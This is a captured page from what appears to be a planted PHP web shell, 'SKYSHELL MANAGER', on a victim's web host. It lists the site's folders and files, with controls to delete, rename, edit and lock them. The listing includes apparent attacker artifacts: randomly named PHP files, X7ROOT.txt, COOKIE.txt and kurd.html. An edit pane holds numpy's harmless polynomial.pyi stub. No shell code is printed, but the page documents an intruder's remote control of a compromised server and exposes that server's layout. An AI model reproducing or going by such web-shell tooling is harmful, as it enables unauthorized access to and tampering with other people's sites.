📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: polynomial.pyi
from typing import ( Literal as L, overload, Any, SupportsInt, SupportsIndex, TypeVar, NoReturn, ) from numpy import ( RankWarning as RankWarning, poly1d as poly1d, unsignedinteger, signedinteger, floating, complexfloating, bool_, int32, int64, float64, complex128, object_, ) from numpy._typing import ( NDArray, ArrayLike, _ArrayLikeBool_co, _ArrayLikeUInt_co, _ArrayLikeInt_co, _ArrayLikeFloat_co, _ArrayLikeComplex_co, _ArrayLikeObject_co, ) _T = TypeVar("_T") _2Tup = tuple[_T, _T] _5Tup = tuple[ _T, NDArray[float64], NDArray[int32], NDArray[float64], NDArray[float64], ] __all__: list[str] def poly(seq_of_zeros: ArrayLike) -> NDArray[floating[Any]]: ... # Returns either a float or complex array depending on the input values. # See `np.linalg.eigvals`. def roots(p: ArrayLike) -> NDArray[complexfloating[Any, Any]] | NDArray[floating[Any]]: ... @overload def polyint( p: poly1d, m: SupportsInt | SupportsIndex = ..., k: None | _ArrayLikeComplex_co | _ArrayLikeObject_co = ..., ) -> poly1d: ... @overload def polyint( p: _ArrayLikeFloat_co, m: SupportsInt | SupportsIndex = ..., k: None | _ArrayLikeFloat_co = ..., ) -> NDArray[floating[Any]]: ... @overload def polyint( p: _ArrayLikeComplex_co, m: SupportsInt | SupportsIndex = ..., k: None | _ArrayLikeComplex_co = ..., ) -> NDArray[complexfloating[Any, Any]]: ... @overload def polyint( p: _ArrayLikeObject_co, m: SupportsInt | SupportsIndex = ..., k: None | _ArrayLikeObject_co = ..., ) -> NDArray[object_]: ... @overload def polyder( p: poly1d, m: SupportsInt | SupportsIndex = ..., ) -> poly1d: ... @overload def polyder( p: _ArrayLikeFloat_co, m: SupportsInt | SupportsIndex = ..., ) -> NDArray[floating[Any]]: ... @overload def polyder( p: _ArrayLikeComplex_co, m: SupportsInt | SupportsIndex = ..., ) -> NDArray[complexfloating[Any, Any]]: ... @overload def polyder( p: _ArrayLikeObject_co, m: SupportsInt | SupportsIndex = ..., ) -> NDArray[object_]: ... @overload def polyfit( x: _ArrayLikeFloat_co, y: _ArrayLikeFloat_co, deg: SupportsIndex | SupportsInt, rcond: None | float = ..., full: L[False] = ..., w: None | _ArrayLikeFloat_co = ..., cov: L[False] = ..., ) -> NDArray[float64]: ... @overload def polyfit( x: _ArrayLikeComplex_co, y: _ArrayLikeComplex_co, deg: SupportsIndex | SupportsInt, rcond: None | float = ..., full: L[False] = ..., w: None | _ArrayLikeFloat_co = ..., cov: L[False] = ..., ) -> NDArray[complex128]: ... @overload def polyfit( x: _ArrayLikeFloat_co, y: _ArrayLikeFloat_co, deg: SupportsIndex | SupportsInt, rcond: None | float = ..., full: L[False] = ..., w: None | _ArrayLikeFloat_co = ..., cov: L[True, "unscaled"] = ..., ) -> _2Tup[NDArray[float64]]: ... @overload def polyfit( x: _ArrayLikeComplex_co, y: _ArrayLikeComplex_co, deg: SupportsIndex | SupportsInt, rcond: None | float = ..., full: L[False] = ..., w: None | _ArrayLikeFloat_co = ..., cov: L[True, "unscaled"] = ..., ) -> _2Tup[NDArray[complex128]]: ... @overload def polyfit( x: _ArrayLikeFloat_co, y: _ArrayLikeFloat_co, deg: SupportsIndex | SupportsInt, rcond: None | float = ..., full: L[True] = ..., w: None | _ArrayLikeFloat_co = ..., cov: bool | L["unscaled"] = ..., ) -> _5Tup[NDArray[float64]]: ... @overload def polyfit( x: _ArrayLikeComplex_co, y: _ArrayLikeComplex_co, deg: SupportsIndex | SupportsInt, rcond: None | float = ..., full: L[True] = ..., w: None | _ArrayLikeFloat_co = ..., cov: bool | L["unscaled"] = ..., ) -> _5Tup[NDArray[complex128]]: ... @overload def polyval( p: _ArrayLikeBool_co, x: _ArrayLikeBool_co, ) -> NDArray[int64]: ... @overload def polyval( p: _ArrayLikeUInt_co, x: _ArrayLikeUInt_co, ) -> NDArray[unsignedinteger[Any]]: ... @overload def polyval( p: _ArrayLikeInt_co, x: _ArrayLikeInt_co, ) -> NDArray[signedinteger[Any]]: ... @overload def polyval( p: _ArrayLikeFloat_co, x: _ArrayLikeFloat_co, ) -> NDArray[floating[Any]]: ... @overload def polyval( p: _ArrayLikeComplex_co, x: _ArrayLikeComplex_co, ) -> NDArray[complexfloating[Any, Any]]: ... @overload def polyval( p: _ArrayLikeObject_co, x: _ArrayLikeObject_co, ) -> NDArray[object_]: ... @overload def polyadd( a1: poly1d, a2: _ArrayLikeComplex_co | _ArrayLikeObject_co, ) -> poly1d: ... @overload def polyadd( a1: _ArrayLikeComplex_co | _ArrayLikeObject_co, a2: poly1d, ) -> poly1d: ... @overload def polyadd( a1: _ArrayLikeBool_co, a2: _ArrayLikeBool_co, ) -> NDArray[bool_]: ... @overload def polyadd( a1: _ArrayLikeUInt_co, a2: _ArrayLikeUInt_co, ) -> NDArray[unsignedinteger[Any]]: ... @overload def polyadd( a1: _ArrayLikeInt_co, a2: _ArrayLikeInt_co, ) -> NDArray[signedinteger[Any]]: ... @overload def polyadd( a1: _ArrayLikeFloat_co, a2: _ArrayLikeFloat_co, ) -> NDArray[floating[Any]]: ... @overload def polyadd( a1: _ArrayLikeComplex_co, a2: _ArrayLikeComplex_co, ) -> NDArray[complexfloating[Any, Any]]: ... @overload def polyadd( a1: _ArrayLikeObject_co, a2: _ArrayLikeObject_co, ) -> NDArray[object_]: ... @overload def polysub( a1: poly1d, a2: _ArrayLikeComplex_co | _ArrayLikeObject_co, ) -> poly1d: ... @overload def polysub( a1: _ArrayLikeComplex_co | _ArrayLikeObject_co, a2: poly1d, ) -> poly1d: ... @overload def polysub( a1: _ArrayLikeBool_co, a2: _ArrayLikeBool_co, ) -> NoReturn: ... @overload def polysub( a1: _ArrayLikeUInt_co, a2: _ArrayLikeUInt_co, ) -> NDArray[unsignedinteger[Any]]: ... @overload def polysub( a1: _ArrayLikeInt_co, a2: _ArrayLikeInt_co, ) -> NDArray[signedinteger[Any]]: ... @overload def polysub( a1: _ArrayLikeFloat_co, a2: _ArrayLikeFloat_co, ) -> NDArray[floating[Any]]: ... @overload def polysub( a1: _ArrayLikeComplex_co, a2: _ArrayLikeComplex_co, ) -> NDArray[complexfloating[Any, Any]]: ... @overload def polysub( a1: _ArrayLikeObject_co, a2: _ArrayLikeObject_co, ) -> NDArray[object_]: ... # NOTE: Not an alias, but they do have the same signature (that we can reuse) polymul = polyadd @overload def polydiv( u: poly1d, v: _ArrayLikeComplex_co | _ArrayLikeObject_co, ) -> _2Tup[poly1d]: ... @overload def polydiv( u: _ArrayLikeComplex_co | _ArrayLikeObject_co, v: poly1d, ) -> _2Tup[poly1d]: ... @overload def polydiv( u: _ArrayLikeFloat_co, v: _ArrayLikeFloat_co, ) -> _2Tup[NDArray[floating[Any]]]: ... @overload def polydiv( u: _ArrayLikeComplex_co, v: _ArrayLikeComplex_co, ) -> _2Tup[NDArray[complexfloating[Any, Any]]]: ... @overload def polydiv( u: _ArrayLikeObject_co, v: _ArrayLikeObject_co, ) -> _2Tup[NDArray[Any]]: ...
Save